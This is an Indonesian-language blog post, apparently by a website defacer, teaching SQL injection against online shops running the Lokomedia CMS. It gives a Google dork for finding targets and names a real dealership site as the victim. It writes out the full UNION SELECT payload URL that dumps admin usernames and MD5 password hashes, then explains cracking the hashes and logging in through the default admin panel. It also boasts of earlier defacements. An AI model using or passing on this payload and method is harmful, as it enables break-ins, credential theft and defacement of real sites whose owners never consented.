yap ini masih sedikit fresh dan pernah saya gunakan dahulu pada saat merayakan 17 agustus 2016 dan tentunya masih banyak yang perawan :D
jika ingin melihat hasilnya bisa lihat saja di https://www.defacer.id/hacker/orie404.html,
oke langsung saja ke tutorialnya.
Dork : inurl:media.php?module=detailproduk
exploit : concat(0x696e6a656b206279206f726965343034,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(admins)where@:=make_set(511,@,0x3c6c693e,username,password)),@))
langsung saja kita masukan dorknya di google :
dan lihat hasilnya sekitar 24.100 hasil yang bisa di hasilkan dari google.
langsung saja kita pilih salah satu webnya.
di sini saya memilih web yg paling atas yaitu :
http://www.toyotatangerangkota.com/media.php?module=detailproduk&id=57
Langsung saja kita injek ke inhek pointnya.
Disini saya pilih injek pointya di url id=57 kita cek vuln atau tidaknya web ini dengan memberi tanda kutip ( ' ) di blakang angka 57 tersebut.
pasti ada pertanyaan knapa gambar menghilang bisa di katakan vuln sqli ?
pada dasarnya kita melihat pasti seorang injektor bukan hanya berpatokan pada munculnyq mysql_error, syntax_error atau yg lain - lainya itu, karena bisa juga kita melihat dari tulisan atau gambar yang menghilang saat di berikan injek point.
oke kita lanjut, selanjutnya kita cek kembali di balakang injek poin / tanda kutip ( ' ) kita tambahkan +--+ jika gambar atau tulisan yang tadinya hilang pada saat kita beri kutip kembali sperti semula bisa di katakn itu 100 % vuln.
Selanjutnya kita tinggal meng order by jumlah columnya yg ada.
di sni saya mendaptkan pada saat order by di angka 14 gambar menghilang sama seperti saat kita pertama memberi injek point.Di sini saya mendapatkan error di angka 14 otomatis jumlah column yang tidak error ada 13 columns sekarang kita tinggal memberikan union all select untuk mencari nomer togelnya :D
Muncul angka togelnya yaitu angka 3,4,5,6,dan 11.
setlah itu tinggal masukan exploitnya di angka togelnya. seperti ini :http://www.toyotatangerangkota.com/media.php?module=detailproduk&id=-57'+UNION+ALL+SELECT+1,2,concat(0x696e6a656b206279206f726965343034,0x3c62723e,make_set(6,@:=0x0a,(select(1)from(admins)where@:=make_set(511,@,0x3c6c693e,username,password)),@)),4,5,6,7,8,9,10,11,12,13+--+
kita bisa langsung melihat hasilnya :
kita langsung mendaptkan hasilnya yaitu username dan password md5
untuk men hash password md5 kita bisa kunjungi https://hashkiller.co.uk/md5-decrypter.aspx
copy paste password md5nya di MD5 Hashes seperti ini :
Kendala dari exploit ini yaitu terkadang kita selalu galgal mend decrypt hash md5 kita yang telah kita dapat :
Tapi jangan khawatir saya punya solusinya kita tinggal hapus angka 0 di paling akhir menjadi sperti ini dan lihat hasilnya :
Kita bisa lihat hasil exploit yg saya gunakan untuk web yg lain.:
Sekian dari saya, sebuah exploit untuk web toko online yang ber CMS lokomedia.
untuk menu adminya kita bisa menggunakan default lokomedia :D
exploitnya cangan dianti cpas dong :v
ReplyDeleteudah - udah :D
Delete